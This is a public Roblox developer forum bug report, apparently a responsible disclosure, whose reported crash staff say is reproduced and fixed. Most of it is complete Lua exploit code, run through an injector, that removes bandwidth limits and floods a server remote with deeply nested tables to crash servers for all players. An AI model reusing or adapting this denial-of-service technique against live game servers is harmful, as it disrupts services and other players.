Users can crash any roblox server using this simple exploit

Bug Reports Engine Bugs
#1

Reproduction Steps
(confidential)
Private Report: https://devforum.roblox.com/t/crash-any-roblox-server-using-this-simple-exploit-bug-report/1780535

EDIT: Roblox has said this is fixed, so posting the original report here to the public:

This exploit works better in higher traffic servers (at least a few players, dont try it alone in your own server)

Run the following code on any exploit injector (worked using Synapse)

-- bypass
game:GetService("NetworkClient"):SetOutgoingKBPSLimit(math.huge)
local function getmaxvalue(val) --calculate maximum value
   local mainvalueifonetable = 4999999 --doing more per 1 table causes a kick
   if type(val) ~= "number" then
       return nil --we cant calcuate if our value isnt a number, lets prevent a error from happening!
   end
   local calculateperfectval = (mainvalueifonetable/(val+2)) --+2 to calculate the spammed table (+1) which is in the main table (+1)
   return calculateperfectval --return the value.
end

local function bomb(tableincrease, tries) --thanks to syria for providing this function. (reestart)
 local maintable = {}
 local spammedtable = {}
 
 table.insert(spammedtable, {})
 z = spammedtable[1]
 
 for i = 1, tableincrease do
    local tableins = {}
    table.insert(z, tableins)
    z = tableins
 end --increases each with the paremeter
 
 local calculatemax = getmaxvalue(tableincrease) --we increased tables, lets calculate the new maximum we're capable of using
 local maximum --setup the max we use after calculating
 
 if calculatemax then
     maximum = calculatemax
     else
     maximum = 4999999 --ok?
 end
 
 for i = 1, maximum do
     table.insert(maintable, spammedtable)
 end --pass each spammed table into main table

 for i = 1, tries do
     game.RobloxReplicatedStorage.SetPlayerBlockList:FireServer(maintable) --push a as a argument and fire for each try.
 end
end

bomb(296, 4) --fire the function or include it in an bot api

Behavior
Ping increases, the eventually the server drops connections with all of its players giving the following message:
unknown1
unknown2

Issue Area: Engine
Issue Type: Crashing
Impact: Very High
Frequency: Constantly
Date First Experienced: 2022-05-04 14:05:00 (-04:00)

20 Likes
#2

Thank you for the report.
We were able to reproduce the issue and will be fixing this.

9 Likes
#3

Just circling back here, this is fixed! Gonna close it out.

1 Like
#4